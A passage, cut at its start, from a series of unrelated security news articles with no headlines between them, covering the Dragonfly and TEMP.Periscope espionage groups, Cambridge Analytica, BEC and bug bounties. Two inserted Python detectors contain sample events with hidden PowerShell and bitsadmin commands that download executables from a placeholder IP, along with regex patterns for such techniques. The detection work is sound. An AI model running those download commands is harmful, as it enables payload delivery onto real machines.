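    r'{"EventID":3,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","User":"CORP\\jdoe","SourceIp":"10.20.30.40","DestinationIp":"203.0.113.45","DestinationPort":445}',
    r'{"EventID":3,"Image":"System","User":"NT AUTHORITY\\SYSTEM","SourceIp":"10.20.30.40","DestinationIp":"10.20.30.5","DestinationPort":445}',
    r'{"EventID":3,"Image":"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe","User":"CORP\\jdoe","SourceIp":"10.20.30.40","DestinationIp":"198.51.100.7","DestinationPort":443}',
    r'{"EventID":3,"Image":"C:\\Windows\\explorer.exe","User":"CORP\\asmith","SourceIp":"10.20.31.12","DestinationIp":"192.0.2.9","DestinationPort":445}',
]


def is_external(ip):
    """True when the address lies outside every configured internal range."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def classify(event):
    """Return a severity for one event, or None if it is not an outbound SMB candidate."""
    if int(event.get("DestinationPort", 0)) not in SMB_PORTS:
        return None
    if not is_external(event["DestinationIp"]):
        return None
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    # An Office process reaching an Internet SMB server is the template-injection shape;
    # any other process doing so still exposes an NTLM exchange and is worth a look.
    return "high" if image in OFFICE_IMAGES else "medium"


def scan(json_lines):
    """Run classify() over JSON lines and return the alerts in input order."""
    alerts = []
    for line in json_lines:
        ev = json.loads(line)
        severity = classify(ev)
        if severity:
            alerts.append({
                "severity": severity,
                "user": ev.get("User"),
                "image": ev.get("Image"),
                "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}',
            })
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Detection here is the second line of defence; the primary mitigation is to block outbound TCP/445 and TCP/139 at the perimeter so the authentication attempt never reaches the attacker's server, after which this rule reports the documents that tried.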
One interesting aspect noticed by Cylance researchers is that the IP address of the SMB server used in the template injection attack was associated with a major state-owned energy conglomerate in Vietnam. Specifically, the IP corresponded to a core Cisco router that had reached end-of-life.
“The use of compromised routing infrastructure for collection or command and control purposes is not new, but its detection is relatively rare,” Cylance researchers explained. “That’s because the compromise of a router very likely implicates the router’s firmware and there simply aren’t as many tools available to the forensic investigator to investigate them. Analysis is further challenged by the lack of system logs.”
“The fact that the threat actor is using this type of infrastructure is a serious and worrisome discovery, since once exploited, vulnerabilities in core infrastructure like routers are not easily closed or remediated,” they added.
Dragonfly is not the only cyberespionage group to abuse routers in its attacks. A threat actor named Slingshot, whose members appear to speak English, has targeted entities in the Middle East and Africa using hacked Mikrotik routers.
Facebook says it has suspended the account of Cambridge Analytica, the data analysis firm hired by Donald Trump's 2016 presidential campaign, amid reports it harvested the profile information of millions of US voters without their permission.
According to the New York Times and Britain's Observer, the company stole information from 50 million Facebook users' profiles in the tech giant's biggest-ever data breach, to help them design software to predict and influence voters' choices at the ballot box.
Also suspended were the accounts of its parent organization, Strategic Communication Laboratories, as well as those of University of Cambridge psychologist Aleksandr Kogan and Christopher Wylie, a Canadian data analytics expert who worked with Kogan.
Cambridge Analytica was bankrolled to the tune of $15 million by US hedge fund billionaire Robert Mercer, a major Republican donor. The Observer said it was headed at the time by Steve Bannon, a top Trump adviser until he was fired last summer.
"In 2015, we learned that... Kogan lied to us and violated our Platform Policies by passing data from an app that was using Facebook Login to SCL/Cambridge Analytica, a firm that does political, government and military work around the globe," Facebook said in a posting late Friday by its vice president and deputy general counsel Paul Grewal.
Kogan also improperly shared the data with Wylie, it said.
Kogan's app, thisisyourdigitallife, offered a personality prediction test, describing itself on Facebook as "a research app used by psychologists."
Some 270,000 people downloaded the app, allowing Kogan to access information such as the city listed on their profile, or content they had "liked."
"However, the app also collected the information of the test-takers' Facebook friends, leading to the accumulation of a data pool tens of millions-strong," the Observer reported.
Facebook later pushed back against the claim of a data breach, issuing a fresh statement on Saturday that suggested the misused data was limited to those who voluntarily took the test.
"People knowingly provided their information, no systems were infiltrated, and no passwords or sensitive pieces of information were stolen or hacked," Grewal said.
Cambridge Analytica meanwhile said it was in touch with Facebook "in order to resolve this matter as quickly as possible."
It blamed the misuse of data on Kogan and said it has since deleted all the data it received from a company he founded, Global Science Research (GSR).
"No data from GSR was used by Cambridge Analytica as part of the services it provided to the Donald Trump 2016 presidential campaign," it said.
- 'Targeting their inner demons' -
But Wylie, who later became a whistleblower, told the Observer: "We exploited Facebook to harvest millions of people's profiles. And built models to exploit what we knew about them and target their inner demons. That was the basis that the entire company was built on."
Kogan legitimately obtained the information but "violated platform policies" by passing information to SCL/Cambridge Analytica and Wylie, according to Facebook.
Facebook said it removed the app in 2015 when it learned of the violation, and was told by Kogan and everyone who received the data that it had since been destroyed.
"Several days ago, we received reports that, contrary to the certifications we were given, not all data was deleted," Grewal wrote.
"We are moving aggressively to determine the accuracy of these claims. If true, this is another unacceptable violation of trust and the commitments they made.
"We are suspending SCL/Cambridge Analytica, Wylie and Kogan from Facebook, pending further information."
- British investigation -
Cambridge Analytica, the US unit of British behavioral marketing firm SCL, rose to prominence as the firm that the pro-Brexit group Leave.EU hired for data-gathering and audience-targeting.
The company is facing an investigation by Britain's parliament and regulators over its handling of information.
On Saturday, Britain's information commissioner Elizabeth Denham said: "We are investigating the circumstances in which Facebook data may have been illegally acquired and used.
"It's part of our ongoing investigation into the use of data analytics for political purposes which was launched to consider how political parties and campaigns, data analytics companies and social media platforms in the UK are using and analyzing people's personal information to micro-target voters."
The New York Times meanwhile reported that copies of the data harvested for Cambridge Analytica were still online and that its team had viewed some of the raw data.
Human-powered Intelligence Plays a Critical Role in Defending Against Socially Engineered Attacks
The FBI’s Internet Crime Complaint Center (IC3) declared Business Email Compromise (BEC) the “3.1 billion dollar scam” in 2016, an amount which then grew in the span of one year into a “5 billion dollar scam.” Trend Micro now projects those losses in excess of 9 billion dollars.
It’s an understatement to say BEC scams and the resulting damages are on the rise. But with cybersecurity spending across all sectors at an all-time high, how is such an unsophisticated threat still costing otherwise well-secured organizations billions of dollars?
Unlike the numerous types of attacks that incorporate malware, most BEC scams rely solely on social engineering. In fact, its use of trickery, deception, and psychological manipulation rather than malware is largely why BEC continually inflicts such substantial damages. Since most network defense solutions are designed to detect emails containing malware and malicious links, BEC emails often land directly in users’ inboxes. And when this happens, the fate of an attempted BEC scam is in the hands of its recipient.
Indeed, BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat. Here’s why:
Human-Powered Intelligence Trumps Automation
Since socially engineered attacks such as BEC are designed to exploit human instincts and emotions, human-powered intelligence naturally plays a critical role in defending against these attacks. I’ve written previously about the limitations of so-called automated intelligence and why human expertise and analysis are irreplaceable. BEC epitomizes this notion.
After all, intelligence offerings that rely solely on automation tend to comprise little more than technical indicators of compromise (IoCs). BEC campaigns can have IoCs—but they tend to be less technical and more nuanced, often pertaining to an attacker’s syntax, dialect, or other behavioral characteristics. While an IoC for a phishing campaign, for example, might be an email address, an IoC for a BEC campaign could be the phrase an attacker uses to open or sign off the email. Automated intelligence offerings and traditional network security solutions are generally not designed to identify these types of IoCs, which is why human-powered intelligence and subject matter expertise are crucial.
User Awareness and Education Prevail
Since traditional network defense solutions alone typically aren’t sufficient countermeasures for BEC, user education—especially when shaped and informed by human-powered intelligence—is crucial. Implementing enterprise-wide efforts to raise awareness of BEC TTPs can help employees more accurately detect and report malicious emails and other socially engineered attacks.
It’s also important to consider that many users may be unaware that BEC is not only a legitimate but also very common threat capable of inflicting significant monetary damages. After all, cybersecurity-related news coverage tends to focus on state-sponsored activity and large-scale cyber attacks such as Mirai or WannaCry. It should come as no surprise that unsophisticated scams such as BEC—though widespread and damaging—are often considered far less newsworthy outside the security community.
Ultimately, the simple yet far-reaching consequences of BEC should serve as a reminder for organizations across all sectors to re-examine the role of human expertise within their security strategies. Remember that even organizations with the most robust defense solutions and advanced automated technologies cannot effectively combat threats such as BEC without the adequate support and nuanced expertise of humans.
As Americans wait to see whether net neutrality can gain enough support among lawmakers to invoke disapproval via the Congressional Review Act, individual states are not waiting -- several are working on state laws to maintain net neutrality within their own borders.
In December 2017, under the chairmanship of Ajit Pai, the FCC voted 3-2 to remove net neutrality protections by rolling back its earlier Obama-era classification of ISPs as telecommunications service providers (and therefore under FCC purview) to the common carriers as they had been previously classified. This has now happened. It simply means that existing FCC rules can no longer be applied to ISPs because they are not telecommunications services. This ruling won't come into effect until April 23; that is, 60 days after publication of the ruling in the Federal Register.
In the meantime, California has now joined the number of states attempting to preserve local net neutrality regardless of federal preferences. California state senator Scott Wiener has introduced SB 822, a comprehensive proposal that would prevent ISPs from blocking websites, throttling users' services or introducing paid priority services within California. In some ways this new bill imposes even stricter net neutrality than that being dismantled by the FCC, by, for example, imposing conditions on the practice of 'zero rating'.
Coincidentally, the communications regulator in the UK, OFCOM, this month announced investigations into service providers Vodafone and Three. Vodafone operates a zero rating option called Vodafone Passes. "Our Passes allow customers to access their favorite content without fear of running out of data or attracting out-of-bundle charges," says a Vodafone statement. "They are open to any content provider of video, music, chat and social. Twenty-two content providers have signed up so far, ensuring Vodafone customers can enjoy the widest selection of worry-free access to content across the industry."
Opponents of net neutrality claim this is good for the consumer, effectively providing free bandwidth to the user. Proponents suggest it can starve new and smaller websites of the visitors they need.
In the U.S., AT&T offers a sponsored data program that is similarly zero rated on data usage. It seems, however, that the only services actually zero rated are owned by AT&T -- such as DirecTV. This gives DirecTV a huge advantage over rival services such as Hulu and Sling, since potential customers are more likely to use the service that has a zero data cost to them.
This is the whole net neutrality argument writ small. Large, established organizations can afford to starve new innovative organizations of internet traffic by paying a premium to the service providers; and will always -- in a completely free market -- be able to buy more of the available bandwidth.
Knock-on concerns are that in order to guarantee bandwidth availability to the large premium-paying customers, it might be necessary to rein back availability to ordinary users -- and in order to encourage those ordinary users to pay more for their bandwidth, there will be a temptation for providers to throttle what is already available.
The difficulty in policing net neutrality is that lawmakers recognize that some lee-way for 'throttling' (in the form of traffic management) will always be necessary. Europe's net neutrality laws require that any such traffic management must be 'transparent, non-discriminatory and proportionate'.
OFCOM has promised an update of its investigation into Vodafone in June, and it's not possible to predict the outcome. Vodafone claims that its Passes service does not generate any bandwidth throttling, and indeed guarantees full service to the consumer. This may be true with just 22 signed up content providers; but may not necessarily be true with 200 signed up content providers.
In California, Senator Wiener's proposal solves this problem, not by banning zero-rating outright, but by allowing it only for whole classes of content provider. In the AT&T example, AT&T could continue to zero-rate DirecTV only if it also zero-rates all similar content providers including Hulu and Sling.
Without doubt, SB 822 is one of the strongest net neutrality bills yet seen; and it will undoubtedly be disliked by the ISP providers. Jamie Davies, writing in Telecoms.com, considers net neutrality to be a heavy-handed approach to bandwidth problems. "The telcos have to be given the opportunity to make money," he writes. "If the telcos are making less money, they are spending less on tackling the increased consumption of data. This is a net loss in the long-run and we do not think this is a nuance of the argument which has been considered by Weiner and his army of preachers."
SB 822 may never happen. It may not be necessary if the Congressional Review Act can be used to overturn the FCC decision; or it may fail to get enough votes in California. Ironically, however, the FCC won't be able to stop it. Back in December, the FCC barred states from adopting their own net neutrality rules -- however, it will not be able to enforce its own rule.
"While the FCC's 2017 Order explicitly bans states from adopting their own net neutrality laws," writes Barbara van Schewick, Professor of Law at Stanford Law School, "that preemption is invalid. According to case law, an agency that does not have the power to regulate does not have the power to preempt. That means the FCC can only prevent the states from adopting net neutrality protections if the FCC has authority to adopt net neutrality protections itself."
The Russian government is behind a sustained hacking effort to take over the control systems of critical US infrastructure like nuclear power plants and water distribution, according to US cyber security investigators.
A technical report released by the Department of Homeland Security on Thursday singled out Moscow as directing the ongoing effort that could give the hackers the ability to sabotage or shut down energy and other utility plants around the country.
It was the first time Washington named the Russian government as behind the attacks which have been taking place for nearly three years.
The allegation added to a series of accusations of political meddling and hacking against Russia that led to Washington announcing fresh sanctions against the country this week.
"Since at least March 2016, Russian government cyber actors... targeted government entities and multiple US critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors," the report from the DHS Computer Emergency Readiness Team said.
DHS, together with the Federal Bureau of Investigation, said the Russian hackers targeted two groups -- the infrastructure operators themselves, and also peripheral "staging targets" which could be used as a stepping stone into the intended targets.
Staging targets included third-party firms that supply services and support to the main targets but may have less secure networks. The hackers had a deep toolbox of methods to enter target systems, they said.
The hacking effort paralleled Russia's alleged operation to interfere with the 2016 US presidential election and continue with online media manipulation throughout 2017.
DHS did not identify specific targets which the Russians broke into. But it said they were able to monitor the behavior of control systems, install their own software, collect the credentials of authorized users, monitor communications, and create administrator accounts to run the systems.
- Sustained attack -
The government has been issuing warnings to operators of US infrastructure -- power producers and distributors, water systems, and others -- about foreign hacking since 2016.
In January a White House report said cyberattacks cost the United States between $57 billion and $109 billion in 2016, and warned that the broader economy could be hurt if the situation worsens. It pointed the finger mainly at attackers from Russia, China, Iran, and North Korea.
Last September the private security firm Symantec outlined hacking efforts focused against US and European energy systems by a high-skilled group it dubbed Dragonfly 2.0.
"The Dragonfly group appears to be interested in both learning how energy facilities operate and also gaining access to operational systems themselves, to the extent that the group now potentially has the ability to sabotage or gain control of these systems should it decide to do so."
Symantec did not name the origin of the group, but the DHS report included Symantec's Dragonfly analysis in its allegations against Russia.
On Thursday the government announced sanctions against Russia's top spy agencies and more than a dozen individuals, citing both the election meddling and cyberattacks.
"We will continue to call out malicious behavior, impose costs, and build expectations for responsible actions in cyberspace," said Rob Joyce, the cybersecurity coordinator on the White House's National Security Council.
Cisco Meraki, a provider of cloud-managed IT solutions, announced last week the launch of a public bug bounty program with rewards of up to $10,000 per vulnerability.
Cisco Meraki, which resulted from Cisco’s acquisition of Meraki in late 2012, started with a private bug bounty program on the Bugcrowd platform. The private program led to the discovery of 39 flaws, for which the company paid out an average of roughly $1,100.
The firm has now decided to open its bug bounty program to all the white hat hackers on Bugcrowd and it’s prepared to pay them between $100 and $10,000 per flaw.
The initiative covers the meraki.com, ikarem.io, meraki.cisco.com and network-auth.com domains and some of their subdomains, the Meraki Dashboard mobile apps for Android and iOS, and products such as the Cisco Meraki MX Security Appliances, Meraki MS Switches, MR Access Points, MV Security Cameras, MC Phones, Systems Manager, and Virtual Security Appliances.
The highest rewards can be earned for serious vulnerabilities in websites (except meraki.cisco.com), and all hardware and software products. Researchers can receive between $6,000 and $10,000 for remote code execution, root logic, sensitive information disclosure, and device configuration hijacking issues.
There is a long list of security issues that are not covered by the program, including denial-of-service (DoS) attacks, SSL-related problems and ones that require man-in-the-middle (MitM) access, clickjacking, and classic self-XSS.
“We invest heavily in tools, processes and technologies to keep our users and their networks safe, including third party audits, features like two-factor authentication and our out-of-band cloud management architecture,” said Sean Rhea, engineering director at Cisco Meraki. “The Cisco Meraki vulnerability rewards program is an important component of our security strategy, encouraging external researchers to collaborate with our security team to help keep networks safe.”
Meraki says its wireless, switching, security, and communications products are used by more than 230,000 global customers for 3 million devices.
Adrian Lamo, the former hacker best known for breaching the systems of The New York Times and turning in Chelsea Manning to authorities, has died at age 37.
His passing was announced on Friday by his father, Mario Lamo, on the Facebook page of the 2600: The Hacker Quarterly magazine.
“With great sadness and a broken heart I have to let know all of Adrian's friends and acquaintances that he is dead. A bright mind and compassionate soul is gone, he was my beloved son…” he wrote.
Lamo had been living in Wichita, Kansas, and he was found dead in an apartment on Wednesday. The cause of death is not known, but representatives of local police said they had found nothing suspicious, The Wichita Eagle reported.
Lamo broke into the systems of companies such as Yahoo, AOL, Comcast, Microsoft and The New York Times in an effort to demonstrate that they had been vulnerable to hacker attacks.
He was arrested in 2003 and in early 2004 he pleaded guilty to computer crimes against Microsoft, The New York Times, and data analytics provider LexisNexis. He was sentenced to six months’ detention at the home of his parents.
Lamo drew criticism in 2010 after he reported Chelsea Manning (at the time U.S. Army intelligence analyst Bradley Manning) to the Army for leaking a massive amount of classified documents to WikiLeaks.
A China-related cyberespionage group that has been active for half a decade has increased its attacks on engineering and maritime entities over the past months, FireEye reports.
Referred to as Leviathan or TEMP.Periscope, the group has been historically interested in targets connected to South China Sea issues, which hasn't changed in the recently observed attacks. Targets include research institutes, academic organizations, and private firms in the United States.
“The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit,” FireEye says.
Over the years, the group has also shown interest in professional/consulting services, high-tech industry, healthcare, and media/publishing. Most of the identified victims were in the United States, with some located in Europe and at least one in Hong Kong.
The group’s tactics, techniques, and procedures (TTPs), as well as its targets, overlap with those associated with the group called TEMP.Jumper, which in turn overlaps significantly with the NanHaiShu group.
The recently observed spike in activity also revealed the use of a broad range of malware that other suspected Chinese groups also use. These tools include backdoors, reconnaissance tools, file stealers, and webshells.
A second backdoor is Badflick, which can modify the file system, generate a reverse shell, and modify its command and control (C&C) configuration.
Another similar piece of malware is Photo, a DLL backdoor that gets directory, file, and drive listings; creates a reverse shell; records the screen, video, and audio; lists, terminates, and creates processes; creates and modifies registry keys and values; logs keystrokes; returns usernames and passwords from protected storage; and can read, create, and modify files.
The group also used Homefry, a 64-bit Windows password dumper/cracker previously used along with the first two backdoors. Based on the commands it receives, it either displays cleartext credentials for each login session, or displays cleartext credentials, NTLM hashes, and the malware version for each login session.
Other tools employed by the hackers include Lunchmoney (which can exfiltrate files to Dropbox) and Murkytop, a command-line reconnaissance tool (which can execute files; move and delete files; schedule remote AT jobs; perform host discovery; scan for open ports on a connected network; and retrieve information about the operating system, users, groups, and shares on remote hosts).
In recent attacks, the group was also observed employing the China Chopper code injection webshell, which is capable of executing Microsoft .NET code within HTTP POST commands (thus it can upload and download files, execute applications, list directory contents, access Active Directory, access databases, and more).
Previously, the group used the Beacon backdoor (commercially available as part of the Cobalt Strike software platform), and the Blackcoffee backdoor, which hides C&C communication as traffic to legitimate websites such as GitHub and Microsoft's TechNet portal.
The group has also been observed using spear phishing emails; lure documents attempting to exploit CVE-2017-11882 to drop malware; stolen code signing certificates to sign its malware; bitsadmin.exe and PowerShell to download additional tools; and Windows Management Instrumentation (WMI) and Windows Shortcut files (.lnk) for persistence.
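As an added example (not from the FireEye report or this article), the following Python triages constructed, Sysmon-style process-creation and file-creation events for the living-off-the-land techniques listed above: bitsadmin.exe and PowerShell downloads, WMI event subscriptions, and shortcut files dropped in a user's Startup folder. The event schema, host names, paths, URLs and the MITRE ATT&CK labels attached to the rules are assumptions made for the example; the sample events are constructed and are not indicators from the report.

```python
import re

# Constructed, Sysmon-style events (assumed schema; not indicators from the
# report). Process creations carry "image" and "cmdline"; file creations carry
# "target". Hosts, paths and the 203.0.113.0/24 address are documentation values.
SAMPLE_EVENTS = [
    {"kind": "process", "host": "ws-01",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority normal "
                r"http://203.0.113.5/up.bin C:\Users\Public\up.bin"},
    {"kind": "process", "host": "ws-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://203.0.113.5/t.exe','C:\\Users\\Public\\t.exe')\""},
    {"kind": "process", "host": "ws-02",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="upd"'},
    {"kind": "file", "host": "ws-02",
     "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
               r"\Start Menu\Programs\Startup\update.lnk"},
    # Benign activity that must not fire: a scheduled inventory script and a
    # desktop shortcut that is outside the Startup folder.
    {"kind": "process", "host": "ws-03",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\Scripts\inventory.ps1"},
    {"kind": "file", "host": "ws-03",
     "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "target": r"C:\Users\alice\Desktop\notes.lnk"},
]

# Per-user Startup folder suffix, lower-cased for case-insensitive matching.
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def _image_is(path, name):
    """True when the executable path ends with the given file name."""
    return path.lower().endswith(name)


# Each rule: (ATT&CK-style label, event kind it applies to, predicate).
# The regexes are deliberately coarse; tune or allowlist per environment.
RULES = [
    ("T1197 BITS Jobs: download via bitsadmin.exe", "process",
     lambda e: _image_is(e["image"], "bitsadmin.exe")
     and re.search(r"/transfer|/addfile|/download", e["cmdline"], re.I) is not None),
    ("T1059.001 PowerShell: remote download cmdlet or .NET web client", "process",
     lambda e: _image_is(e["image"], "powershell.exe")
     and re.search(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|start-bitstransfer",
                   e["cmdline"], re.I) is not None),
    ("T1546.003 WMI Event Subscription persistence", "process",
     lambda e: re.search(r"__EventFilter|CommandLineEventConsumer|__FilterToConsumerBinding",
                         e["cmdline"], re.I) is not None),
    ("T1547.009 Shortcut dropped in Startup folder", "file",
     lambda e: _image_is(e["target"], ".lnk") and STARTUP_DIR in e["target"].lower()),
]


def detect(events):
    """Return one finding per (event, rule) match, preserving event order."""
    findings = []
    for event in events:
        for label, kind, matches in RULES:
            if event["kind"] == kind and matches(event):
                findings.append({
                    "host": event["host"],
                    "technique": label,
                    "evidence": event.get("cmdline") or event.get("target"),
                })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"{finding['host']}: {finding['technique']}\n    {finding['evidence']}")
```

Run against the constructed events, the four malicious records each produce exactly one finding and the two benign records produce none. In a real environment these rules belong in the SIEM or EDR query layer with allowlists for legitimate BITS and PowerShell automation; the point of the example is the structure (typed events, one predicate per technique, evidence carried into the finding), not the exact strings.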
“The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations,” FireEye concludes.
Git repository hosting service GitHub paid a total of $166,495 in rewards in 2017 to security researchers who reported vulnerabilities as part of its four-year-old bug bounty program.
Total payouts more than doubled compared to the $81,700 paid in 2016 and were nearly equal to the total bounties paid during the first three years of the program: $177,000. During the first two years of the program, the company paid $95,300 in bug bounties.
Throughout the year, the company received a total of 840 submissions to the program, but resolved and rewarded only 121 of them (15%). In 2016, GitHub rewarded 73 of the 795 valid reports it received, with only 48 submissions being rated highly enough to appear on the bug bounty program’s page.
The number of valid reports fueled the increase in total payouts and also resulted in GitHub re-evaluating its payout structure in October 2017. Thus, the bug bounties were doubled, with the minimum and maximum payouts now at $555 and $20,000.
With participation by researchers, program initiatives, and the rewards paid out all continuing to grow, 2017 proved the program's biggest year yet, GitHub’s Greg Ose points out.
Last year, the company also announced the introduction of GitHub Enterprise to the bug bounty program, allowing researchers to find vulnerabilities in areas that may not be exposed on GitHub.com or that are specific to enterprise deployments.
“In the beginning of 2017, a number of reports impacting our enterprise authentication methods prompted us to not only focus on this internally, but also identify how we could engage researchers to focus on this functionality,” Ose notes.
He also says GitHub has launched its first researcher grant, an initiative the company has been long focused on. This effort involves paying “a fixed amount to a researcher to dig into a specific feature or area of the application.” Any discovered vulnerability would also be rewarded through the Bug Bounty program.
Last year, GitHub also rolled out private bug bounties, which allowed it to limit the impact of vulnerabilities in production. The company also made internal improvements to the program so that submissions are triaged and remediated more efficiently, and it plans to refine the process further in 2018.
GitHub is looking to expand the initiatives that proved successful in 2017, launching more private bounties and research grants to gain focus on various features before and after they publicly launch. The company also plans additional promotions later this year.
“Given the program’s success, we’re also looking to see how we can expand its scope to help secure our production services and protect GitHub’s ecosystem. We’re excited for what’s next and look forward to triaging and fixing your submissions this year,” Ose concludes.